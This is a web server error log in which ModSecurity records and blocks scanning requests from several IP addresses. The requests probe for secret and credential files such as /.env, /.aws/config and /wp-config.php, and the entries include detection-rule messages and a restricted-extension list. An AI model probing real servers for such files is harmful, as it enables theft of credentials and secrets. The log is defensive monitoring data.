[Sun Nov 30 12:33:04.807948 2025] [:error] [pid 427776] [client 195.178.110.68:18342] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSwrcBlsVScx5wrU222RZwAAACk"]
[Sun Nov 30 12:33:05.285722 2025] [:error] [pid 427804] [client 195.178.110.68:18344] [client 195.178.110.68] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aSwrcX-YzzK-2pqhifF32QAAAEU"]
[Sun Nov 30 12:33:05.285941 2025] [:error] [pid 427804] [client 195.178.110.68:18344] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aSwrcX-YzzK-2pqhifF32QAAAEU"]
[Sun Nov 30 12:33:05.286111 2025] [:error] [pid 427804] [client 195.178.110.68:18344] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aSwrcX-YzzK-2pqhifF32QAAAEU"]
[Sun Nov 30 12:33:05.944952 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSwrcUR0pJY8_qkvKEEfJQAAAAM"]
[Sun Nov 30 12:33:05.945173 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSwrcUR0pJY8_qkvKEEfJQAAAAM"]
[Sun Nov 30 12:33:05.945376 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSwrcUR0pJY8_qkvKEEfJQAAAAM"]
[Sun Nov 30 12:33:06.056002 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSwrckR0pJY8_qkvKEEfJgAAAAM"]
[Sun Nov 30 12:33:06.056170 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSwrckR0pJY8_qkvKEEfJgAAAAM"]
[Sun Nov 30 12:33:06.056369 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSwrckR0pJY8_qkvKEEfJgAAAAM"]
[Sun Nov 30 12:33:06.056557 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSwrckR0pJY8_qkvKEEfJgAAAAM"]
[Sun Nov 30 12:33:09.062977 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSwrdUR0pJY8_qkvKEEfJwAAAAM"]
[Sun Nov 30 12:33:09.063210 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSwrdUR0pJY8_qkvKEEfJwAAAAM"]
[Sun Nov 30 12:33:09.063422 2025] [:error] [pid 429217] [client 195.178.110.68:18306] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSwrdUR0pJY8_qkvKEEfJwAAAAM"]
[Sun Nov 30 12:33:26.776248 2025] [:error] [pid 429223] [client 195.178.110.68:29072] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSwrhtMyFfd1ub28FSGX7gAAAAQ"]
[Sun Nov 30 12:33:26.776509 2025] [:error] [pid 429223] [client 195.178.110.68:29072] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSwrhtMyFfd1ub28FSGX7gAAAAQ"]
[Sun Nov 30 12:33:26.776703 2025] [:error] [pid 429223] [client 195.178.110.68:29072] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSwrhtMyFfd1ub28FSGX7gAAAAQ"]
[Sun Nov 30 20:17:48.871156 2025] [:error] [pid 427804] [client 35.222.252.124:45250] [client 35.222.252.124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSyYXH-YzzK-2pqhifF4xgAAAEU"]
[Sun Nov 30 20:17:48.871505 2025] [:error] [pid 427804] [client 35.222.252.124:45250] [client 35.222.252.124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSyYXH-YzzK-2pqhifF4xgAAAEU"]
[Sun Nov 30 20:17:48.871718 2025] [:error] [pid 427804] [client 35.222.252.124:45250] [client 35.222.252.124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSyYXH-YzzK-2pqhifF4xgAAAEU"]
[Mon Dec 01 02:09:01.937560 2025] [authz_core:error] [pid 438190] [client 45.144.212.58:36360] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Dec 01 11:22:32.039175 2025] [:error] [pid 441954] [client 2.57.122.173:33556] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS1saHijrbz5Mx7E72Y76AAAAAQ"]
[Mon Dec 01 11:22:32.039463 2025] [:error] [pid 441954] [client 2.57.122.173:33556] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS1saHijrbz5Mx7E72Y76AAAAAQ"]
[Mon Dec 01 11:22:32.039703 2025] [:error] [pid 441954] [client 2.57.122.173:33556] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS1saHijrbz5Mx7E72Y76AAAAAQ"]
[Mon Dec 01 19:06:25.344081 2025] [:error] [pid 441952] [client 45.139.104.171:36586] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS3ZIeBxagKneyKPxx8p_wAAAAI"]
[Mon Dec 01 19:06:25.344401 2025] [:error] [pid 441952] [client 45.139.104.171:36586] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS3ZIeBxagKneyKPxx8p_wAAAAI"]
[Mon Dec 01 19:06:25.344644 2025] [:error] [pid 441952] [client 45.139.104.171:36586] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS3ZIeBxagKneyKPxx8p_wAAAAI"]
[Mon Dec 01 21:03:26.880945 2025] [:error] [pid 448713] [client 45.139.104.171:46146] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS30jhHIgSRdx--qNk2hewAAAAk"]
[Mon Dec 01 21:03:26.881319 2025] [:error] [pid 448713] [client 45.139.104.171:46146] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS30jhHIgSRdx--qNk2hewAAAAk"]
[Mon Dec 01 21:03:26.881511 2025] [:error] [pid 448713] [client 45.139.104.171:46146] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS30jhHIgSRdx--qNk2hewAAAAk"]
[Tue Dec 02 01:04:23.974016 2025] [:error] [pid 459857] [client 35.223.54.147:56018] [client 35.223.54.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4tB-BD_ixVuws3OFpcnAAAAAQ"]
[Tue Dec 02 01:04:23.974262 2025] [:error] [pid 459857] [client 35.223.54.147:56018] [client 35.223.54.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4tB-BD_ixVuws3OFpcnAAAAAQ"]
[Tue Dec 02 01:04:23.974445 2025] [:error] [pid 459857] [client 35.223.54.147:56018] [client 35.223.54.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4tB-BD_ixVuws3OFpcnAAAAAQ"]
[Tue Dec 02 01:06:27.325509 2025] [:error] [pid 459853] [client 34.9.16.66:39124] [client 34.9.16.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4tgyzewEr8PNdW5fE1qQAAAAA"]
[Tue Dec 02 01:06:27.325768 2025] [:error] [pid 459853] [client 34.9.16.66:39124] [client 34.9.16.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4tgyzewEr8PNdW5fE1qQAAAAA"]
[Tue Dec 02 01:06:27.325938 2025] [:error] [pid 459853] [client 34.9.16.66:39124] [client 34.9.16.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4tgyzewEr8PNdW5fE1qQAAAAA"]
[Tue Dec 02 01:08:08.778897 2025] [:error] [pid 459854] [client 35.224.10.236:38704] [client 35.224.10.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4t6MPvbLefpN3z_AR3mAAAAAE"]
[Tue Dec 02 01:08:08.779140 2025] [:error] [pid 459854] [client 35.224.10.236:38704] [client 35.224.10.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4t6MPvbLefpN3z_AR3mAAAAAE"]
[Tue Dec 02 01:08:08.779322 2025] [:error] [pid 459854] [client 35.224.10.236:38704] [client 35.224.10.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS4t6MPvbLefpN3z_AR3mAAAAAE"]
[Tue Dec 02 13:18:53.325753 2025] [:error] [pid 464251] [client 45.139.104.171:51636] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS7ZLVeGvt2ZFTja4GwJigAAAAI"]
[Tue Dec 02 13:18:53.326106 2025] [:error] [pid 464251] [client 45.139.104.171:51636] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS7ZLVeGvt2ZFTja4GwJigAAAAI"]
